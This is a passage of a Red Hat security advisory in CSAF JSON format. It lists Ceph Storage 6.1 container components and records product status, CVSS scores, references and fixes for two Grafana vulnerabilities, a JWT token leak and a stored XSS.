"product_reference": "rhceph/keepalived-rhel9@sha256:49e943d69210eb9f4218272f64cc2b9a100bb52416784c417b241c7dcd0eeb23_amd64",
"relates_to_product_reference": "9Base-RHCEPH-6.1-Tools"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rhceph/keepalived-rhel9@sha256:561fba3667ff302316ecef3dc7a80202ec5b854b347e4cbc5d2d4a2ad4419ed3_s390x as a component of Red Hat Ceph Storage 6.1 Tools",
"product_id": "9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:561fba3667ff302316ecef3dc7a80202ec5b854b347e4cbc5d2d4a2ad4419ed3_s390x"
},
"product_reference": "rhceph/keepalived-rhel9@sha256:561fba3667ff302316ecef3dc7a80202ec5b854b347e4cbc5d2d4a2ad4419ed3_s390x",
"relates_to_product_reference": "9Base-RHCEPH-6.1-Tools"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rhceph/keepalived-rhel9@sha256:e12cb06f04ac2870d5c387612f4aab65438c4b8044337ab8c55e924dc273ee6b_ppc64le as a component of Red Hat Ceph Storage 6.1 Tools",
"product_id": "9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:e12cb06f04ac2870d5c387612f4aab65438c4b8044337ab8c55e924dc273ee6b_ppc64le"
},
"product_reference": "rhceph/keepalived-rhel9@sha256:e12cb06f04ac2870d5c387612f4aab65438c4b8044337ab8c55e924dc273ee6b_ppc64le",
"relates_to_product_reference": "9Base-RHCEPH-6.1-Tools"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rhceph/rhceph-6-dashboard-rhel9@sha256:4dc1e2ace5946178fae29c87e2f86467594833e27ddfef8a005273eb9a1bee45_s390x as a component of Red Hat Ceph Storage 6.1 Tools",
"product_id": "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:4dc1e2ace5946178fae29c87e2f86467594833e27ddfef8a005273eb9a1bee45_s390x"
},
"product_reference": "rhceph/rhceph-6-dashboard-rhel9@sha256:4dc1e2ace5946178fae29c87e2f86467594833e27ddfef8a005273eb9a1bee45_s390x",
"relates_to_product_reference": "9Base-RHCEPH-6.1-Tools"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rhceph/rhceph-6-dashboard-rhel9@sha256:72ebf29aa3a85cf49949379958744a699e1f572f79abf75e7cb8094ceecf074e_ppc64le as a component of Red Hat Ceph Storage 6.1 Tools",
"product_id": "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:72ebf29aa3a85cf49949379958744a699e1f572f79abf75e7cb8094ceecf074e_ppc64le"
},
"product_reference": "rhceph/rhceph-6-dashboard-rhel9@sha256:72ebf29aa3a85cf49949379958744a699e1f572f79abf75e7cb8094ceecf074e_ppc64le",
"relates_to_product_reference": "9Base-RHCEPH-6.1-Tools"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rhceph/rhceph-6-dashboard-rhel9@sha256:ba574717bd9890dcf1677c9b56d45a2047bb1f6a72a0bb5b8e38c6f3f2db4884_amd64 as a component of Red Hat Ceph Storage 6.1 Tools",
"product_id": "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:ba574717bd9890dcf1677c9b56d45a2047bb1f6a72a0bb5b8e38c6f3f2db4884_amd64"
},
"product_reference": "rhceph/rhceph-6-dashboard-rhel9@sha256:ba574717bd9890dcf1677c9b56d45a2047bb1f6a72a0bb5b8e38c6f3f2db4884_amd64",
"relates_to_product_reference": "9Base-RHCEPH-6.1-Tools"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rhceph/rhceph-6-rhel9@sha256:0809ac10fd225656d8fec0002f71c41f7a07d9c5be0c0affd5740cdae43efcf8_amd64 as a component of Red Hat Ceph Storage 6.1 Tools",
"product_id": "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:0809ac10fd225656d8fec0002f71c41f7a07d9c5be0c0affd5740cdae43efcf8_amd64"
},
"product_reference": "rhceph/rhceph-6-rhel9@sha256:0809ac10fd225656d8fec0002f71c41f7a07d9c5be0c0affd5740cdae43efcf8_amd64",
"relates_to_product_reference": "9Base-RHCEPH-6.1-Tools"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rhceph/rhceph-6-rhel9@sha256:6c58ed8e6779027d62bca2dab2de0336ee630257dc903c0ff8069ec986395f47_ppc64le as a component of Red Hat Ceph Storage 6.1 Tools",
"product_id": "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:6c58ed8e6779027d62bca2dab2de0336ee630257dc903c0ff8069ec986395f47_ppc64le"
},
"product_reference": "rhceph/rhceph-6-rhel9@sha256:6c58ed8e6779027d62bca2dab2de0336ee630257dc903c0ff8069ec986395f47_ppc64le",
"relates_to_product_reference": "9Base-RHCEPH-6.1-Tools"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rhceph/rhceph-6-rhel9@sha256:f3eb950ff155132b8d113853d05a917a4e949fa80156bbbdda8e61a5a7d18799_s390x as a component of Red Hat Ceph Storage 6.1 Tools",
"product_id": "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:f3eb950ff155132b8d113853d05a917a4e949fa80156bbbdda8e61a5a7d18799_s390x"
},
"product_reference": "rhceph/rhceph-6-rhel9@sha256:f3eb950ff155132b8d113853d05a917a4e949fa80156bbbdda8e61a5a7d18799_s390x",
"relates_to_product_reference": "9Base-RHCEPH-6.1-Tools"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rhceph/rhceph-haproxy-rhel9@sha256:04e7e7a046da793f667daa0d1eb8dc90ea984dcd1bdefc8a7b96441a6251b280_amd64 as a component of Red Hat Ceph Storage 6.1 Tools",
"product_id": "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:04e7e7a046da793f667daa0d1eb8dc90ea984dcd1bdefc8a7b96441a6251b280_amd64"
},
"product_reference": "rhceph/rhceph-haproxy-rhel9@sha256:04e7e7a046da793f667daa0d1eb8dc90ea984dcd1bdefc8a7b96441a6251b280_amd64",
"relates_to_product_reference": "9Base-RHCEPH-6.1-Tools"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rhceph/rhceph-haproxy-rhel9@sha256:6f6ed4e34b8450b5af74cab6bab790013006269cb997883fc50f5c20c1f5dd8d_s390x as a component of Red Hat Ceph Storage 6.1 Tools",
"product_id": "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:6f6ed4e34b8450b5af74cab6bab790013006269cb997883fc50f5c20c1f5dd8d_s390x"
},
"product_reference": "rhceph/rhceph-haproxy-rhel9@sha256:6f6ed4e34b8450b5af74cab6bab790013006269cb997883fc50f5c20c1f5dd8d_s390x",
"relates_to_product_reference": "9Base-RHCEPH-6.1-Tools"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rhceph/rhceph-haproxy-rhel9@sha256:fd567a237640c49c3cb5d392aa995069eb6d7398bffb2fe982f57563b640d630_ppc64le as a component of Red Hat Ceph Storage 6.1 Tools",
"product_id": "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:fd567a237640c49c3cb5d392aa995069eb6d7398bffb2fe982f57563b640d630_ppc64le"
},
"product_reference": "rhceph/rhceph-haproxy-rhel9@sha256:fd567a237640c49c3cb5d392aa995069eb6d7398bffb2fe982f57563b640d630_ppc64le",
"relates_to_product_reference": "9Base-RHCEPH-6.1-Tools"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rhceph/rhceph-promtail-rhel9@sha256:9276234cb0599b75d0adc88c7b1882ff3da6742306a30f26dade3f9bde06ec7e_ppc64le as a component of Red Hat Ceph Storage 6.1 Tools",
"product_id": "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:9276234cb0599b75d0adc88c7b1882ff3da6742306a30f26dade3f9bde06ec7e_ppc64le"
},
"product_reference": "rhceph/rhceph-promtail-rhel9@sha256:9276234cb0599b75d0adc88c7b1882ff3da6742306a30f26dade3f9bde06ec7e_ppc64le",
"relates_to_product_reference": "9Base-RHCEPH-6.1-Tools"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rhceph/rhceph-promtail-rhel9@sha256:93b546b7d97fd7fdaf9aef486218350817697a6237cbc3ff512eef40ef772a3a_s390x as a component of Red Hat Ceph Storage 6.1 Tools",
"product_id": "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:93b546b7d97fd7fdaf9aef486218350817697a6237cbc3ff512eef40ef772a3a_s390x"
},
"product_reference": "rhceph/rhceph-promtail-rhel9@sha256:93b546b7d97fd7fdaf9aef486218350817697a6237cbc3ff512eef40ef772a3a_s390x",
"relates_to_product_reference": "9Base-RHCEPH-6.1-Tools"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rhceph/rhceph-promtail-rhel9@sha256:d6233ee14663867808ca616c9327278af99e0439f0781b548be35e6ab5777de2_amd64 as a component of Red Hat Ceph Storage 6.1 Tools",
"product_id": "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:d6233ee14663867808ca616c9327278af99e0439f0781b548be35e6ab5777de2_amd64"
},
"product_reference": "rhceph/rhceph-promtail-rhel9@sha256:d6233ee14663867808ca616c9327278af99e0439f0781b548be35e6ab5777de2_amd64",
"relates_to_product_reference": "9Base-RHCEPH-6.1-Tools"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rhceph/snmp-notifier-rhel9@sha256:39e1eb86a6cc6eaa31018a13f86bbb676ec26250d5daf116e3be6d6d194bfe42_ppc64le as a component of Red Hat Ceph Storage 6.1 Tools",
"product_id": "9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:39e1eb86a6cc6eaa31018a13f86bbb676ec26250d5daf116e3be6d6d194bfe42_ppc64le"
},
"product_reference": "rhceph/snmp-notifier-rhel9@sha256:39e1eb86a6cc6eaa31018a13f86bbb676ec26250d5daf116e3be6d6d194bfe42_ppc64le",
"relates_to_product_reference": "9Base-RHCEPH-6.1-Tools"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rhceph/snmp-notifier-rhel9@sha256:a47193626427bfe8f686c9f591248d082271c0d20aed96aa268bf7a03b9123d8_s390x as a component of Red Hat Ceph Storage 6.1 Tools",
"product_id": "9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:a47193626427bfe8f686c9f591248d082271c0d20aed96aa268bf7a03b9123d8_s390x"
},
"product_reference": "rhceph/snmp-notifier-rhel9@sha256:a47193626427bfe8f686c9f591248d082271c0d20aed96aa268bf7a03b9123d8_s390x",
"relates_to_product_reference": "9Base-RHCEPH-6.1-Tools"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rhceph/snmp-notifier-rhel9@sha256:ca759591794df7f94b67bf798d7d27dd6d2b45d49b8ef8511e2bf51f78672d7e_amd64 as a component of Red Hat Ceph Storage 6.1 Tools",
"product_id": "9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:ca759591794df7f94b67bf798d7d27dd6d2b45d49b8ef8511e2bf51f78672d7e_amd64"
},
"product_reference": "rhceph/snmp-notifier-rhel9@sha256:ca759591794df7f94b67bf798d7d27dd6d2b45d49b8ef8511e2bf51f78672d7e_amd64",
"relates_to_product_reference": "9Base-RHCEPH-6.1-Tools"
}
]
},
"vulnerabilities": [
{
"acknowledgments": [
{
"names": [
"Grafana Security Team"
],
"summary": "Acknowledged by upstream."
}
],
"cve": "CVE-2023-1387",
"cwe": {
"id": "CWE-200",
"name": "Exposure of Sensitive Information to an Unauthorized Actor"
},
"discovery_date": "2023-04-12T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:49e943d69210eb9f4218272f64cc2b9a100bb52416784c417b241c7dcd0eeb23_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:561fba3667ff302316ecef3dc7a80202ec5b854b347e4cbc5d2d4a2ad4419ed3_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:e12cb06f04ac2870d5c387612f4aab65438c4b8044337ab8c55e924dc273ee6b_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:0809ac10fd225656d8fec0002f71c41f7a07d9c5be0c0affd5740cdae43efcf8_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:6c58ed8e6779027d62bca2dab2de0336ee630257dc903c0ff8069ec986395f47_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:f3eb950ff155132b8d113853d05a917a4e949fa80156bbbdda8e61a5a7d18799_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:04e7e7a046da793f667daa0d1eb8dc90ea984dcd1bdefc8a7b96441a6251b280_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:6f6ed4e34b8450b5af74cab6bab790013006269cb997883fc50f5c20c1f5dd8d_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:fd567a237640c49c3cb5d392aa995069eb6d7398bffb2fe982f57563b640d630_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:9276234cb0599b75d0adc88c7b1882ff3da6742306a30f26dade3f9bde06ec7e_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:93b546b7d97fd7fdaf9aef486218350817697a6237cbc3ff512eef40ef772a3a_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:d6233ee14663867808ca616c9327278af99e0439f0781b548be35e6ab5777de2_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:39e1eb86a6cc6eaa31018a13f86bbb676ec26250d5daf116e3be6d6d194bfe42_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:a47193626427bfe8f686c9f591248d082271c0d20aed96aa268bf7a03b9123d8_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:ca759591794df7f94b67bf798d7d27dd6d2b45d49b8ef8511e2bf51f78672d7e_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2186322"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Grafana. This flaw allows a remote, authenticated attacker to obtain sensitive information caused by an issue when enabling the \"url_login\" configuration option. By sending a specially crafted request, an attacker can obtain JWT information and use this to launch further attacks against the affected system.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "grafana: JWT token leak to data source",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:4dc1e2ace5946178fae29c87e2f86467594833e27ddfef8a005273eb9a1bee45_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:72ebf29aa3a85cf49949379958744a699e1f572f79abf75e7cb8094ceecf074e_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:ba574717bd9890dcf1677c9b56d45a2047bb1f6a72a0bb5b8e38c6f3f2db4884_amd64"
],
"known_not_affected": [
"9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:49e943d69210eb9f4218272f64cc2b9a100bb52416784c417b241c7dcd0eeb23_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:561fba3667ff302316ecef3dc7a80202ec5b854b347e4cbc5d2d4a2ad4419ed3_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:e12cb06f04ac2870d5c387612f4aab65438c4b8044337ab8c55e924dc273ee6b_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:0809ac10fd225656d8fec0002f71c41f7a07d9c5be0c0affd5740cdae43efcf8_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:6c58ed8e6779027d62bca2dab2de0336ee630257dc903c0ff8069ec986395f47_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:f3eb950ff155132b8d113853d05a917a4e949fa80156bbbdda8e61a5a7d18799_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:04e7e7a046da793f667daa0d1eb8dc90ea984dcd1bdefc8a7b96441a6251b280_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:6f6ed4e34b8450b5af74cab6bab790013006269cb997883fc50f5c20c1f5dd8d_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:fd567a237640c49c3cb5d392aa995069eb6d7398bffb2fe982f57563b640d630_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:9276234cb0599b75d0adc88c7b1882ff3da6742306a30f26dade3f9bde06ec7e_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:93b546b7d97fd7fdaf9aef486218350817697a6237cbc3ff512eef40ef772a3a_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:d6233ee14663867808ca616c9327278af99e0439f0781b548be35e6ab5777de2_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:39e1eb86a6cc6eaa31018a13f86bbb676ec26250d5daf116e3be6d6d194bfe42_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:a47193626427bfe8f686c9f591248d082271c0d20aed96aa268bf7a03b9123d8_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:ca759591794df7f94b67bf798d7d27dd6d2b45d49b8ef8511e2bf51f78672d7e_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2023-1387"
},
{
"category": "external",
"summary": "RHBZ#2186322",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2186322"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2023-1387",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-1387"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2023-1387",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-1387"
},
{
"category": "external",
"summary": "https://grafana.com/blog/2023/04/26/grafana-security-release-new-versions-of-grafana-with-security-fixes-for-cve-2023-28119-and-cve-2023-1387/",
"url": "https://grafana.com/blog/2023/04/26/grafana-security-release-new-versions-of-grafana-with-security-fixes-for-cve-2023-28119-and-cve-2023-1387/"
},
{
"category": "external",
"summary": "https://grafana.com/security/security-advisories/cve-2023-1387/",
"url": "https://grafana.com/security/security-advisories/cve-2023-1387/"
}
],
"release_date": "2023-04-12T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2023-12-12T13:55:37+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_ceph_storage/6\n\nFor supported configurations, refer to:\n\nhttps://access.redhat.com/articles/1548993",
"product_ids": [
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:4dc1e2ace5946178fae29c87e2f86467594833e27ddfef8a005273eb9a1bee45_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:72ebf29aa3a85cf49949379958744a699e1f572f79abf75e7cb8094ceecf074e_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:ba574717bd9890dcf1677c9b56d45a2047bb1f6a72a0bb5b8e38c6f3f2db4884_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2023:7741"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:49e943d69210eb9f4218272f64cc2b9a100bb52416784c417b241c7dcd0eeb23_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:561fba3667ff302316ecef3dc7a80202ec5b854b347e4cbc5d2d4a2ad4419ed3_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:e12cb06f04ac2870d5c387612f4aab65438c4b8044337ab8c55e924dc273ee6b_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:4dc1e2ace5946178fae29c87e2f86467594833e27ddfef8a005273eb9a1bee45_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:72ebf29aa3a85cf49949379958744a699e1f572f79abf75e7cb8094ceecf074e_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:ba574717bd9890dcf1677c9b56d45a2047bb1f6a72a0bb5b8e38c6f3f2db4884_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:0809ac10fd225656d8fec0002f71c41f7a07d9c5be0c0affd5740cdae43efcf8_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:6c58ed8e6779027d62bca2dab2de0336ee630257dc903c0ff8069ec986395f47_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:f3eb950ff155132b8d113853d05a917a4e949fa80156bbbdda8e61a5a7d18799_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:04e7e7a046da793f667daa0d1eb8dc90ea984dcd1bdefc8a7b96441a6251b280_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:6f6ed4e34b8450b5af74cab6bab790013006269cb997883fc50f5c20c1f5dd8d_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:fd567a237640c49c3cb5d392aa995069eb6d7398bffb2fe982f57563b640d630_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:9276234cb0599b75d0adc88c7b1882ff3da6742306a30f26dade3f9bde06ec7e_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:93b546b7d97fd7fdaf9aef486218350817697a6237cbc3ff512eef40ef772a3a_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:d6233ee14663867808ca616c9327278af99e0439f0781b548be35e6ab5777de2_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:39e1eb86a6cc6eaa31018a13f86bbb676ec26250d5daf116e3be6d6d194bfe42_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:a47193626427bfe8f686c9f591248d082271c0d20aed96aa268bf7a03b9123d8_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:ca759591794df7f94b67bf798d7d27dd6d2b45d49b8ef8511e2bf51f78672d7e_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "grafana: JWT token leak to data source"
},
{
"cve": "CVE-2023-1410",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2023-03-23T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:49e943d69210eb9f4218272f64cc2b9a100bb52416784c417b241c7dcd0eeb23_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:561fba3667ff302316ecef3dc7a80202ec5b854b347e4cbc5d2d4a2ad4419ed3_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:e12cb06f04ac2870d5c387612f4aab65438c4b8044337ab8c55e924dc273ee6b_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:0809ac10fd225656d8fec0002f71c41f7a07d9c5be0c0affd5740cdae43efcf8_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:6c58ed8e6779027d62bca2dab2de0336ee630257dc903c0ff8069ec986395f47_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:f3eb950ff155132b8d113853d05a917a4e949fa80156bbbdda8e61a5a7d18799_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:04e7e7a046da793f667daa0d1eb8dc90ea984dcd1bdefc8a7b96441a6251b280_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:6f6ed4e34b8450b5af74cab6bab790013006269cb997883fc50f5c20c1f5dd8d_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:fd567a237640c49c3cb5d392aa995069eb6d7398bffb2fe982f57563b640d630_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:9276234cb0599b75d0adc88c7b1882ff3da6742306a30f26dade3f9bde06ec7e_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:93b546b7d97fd7fdaf9aef486218350817697a6237cbc3ff512eef40ef772a3a_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:d6233ee14663867808ca616c9327278af99e0439f0781b548be35e6ab5777de2_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:39e1eb86a6cc6eaa31018a13f86bbb676ec26250d5daf116e3be6d6d194bfe42_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:a47193626427bfe8f686c9f591248d082271c0d20aed96aa268bf7a03b9123d8_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:ca759591794df7f94b67bf798d7d27dd6d2b45d49b8ef8511e2bf51f78672d7e_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2181117"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Grafana. This flaw allows an attacker to host a Graphite instance with modified Function Descriptions containing XSS payloads. When the victim uses it in a query and accidentally hovers over the Function Description, an attacker-controlled XSS payload will be executed.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "grafana: Stored XSS in Graphite FunctionDescription tooltip",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:4dc1e2ace5946178fae29c87e2f86467594833e27ddfef8a005273eb9a1bee45_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:72ebf29aa3a85cf49949379958744a699e1f572f79abf75e7cb8094ceecf074e_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:ba574717bd9890dcf1677c9b56d45a2047bb1f6a72a0bb5b8e38c6f3f2db4884_amd64"
],
"known_not_affected": [
"9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:49e943d69210eb9f4218272f64cc2b9a100bb52416784c417b241c7dcd0eeb23_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:561fba3667ff302316ecef3dc7a80202ec5b854b347e4cbc5d2d4a2ad4419ed3_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:e12cb06f04ac2870d5c387612f4aab65438c4b8044337ab8c55e924dc273ee6b_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:0809ac10fd225656d8fec0002f71c41f7a07d9c5be0c0affd5740cdae43efcf8_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:6c58ed8e6779027d62bca2dab2de0336ee630257dc903c0ff8069ec986395f47_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:f3eb950ff155132b8d113853d05a917a4e949fa80156bbbdda8e61a5a7d18799_s390x",
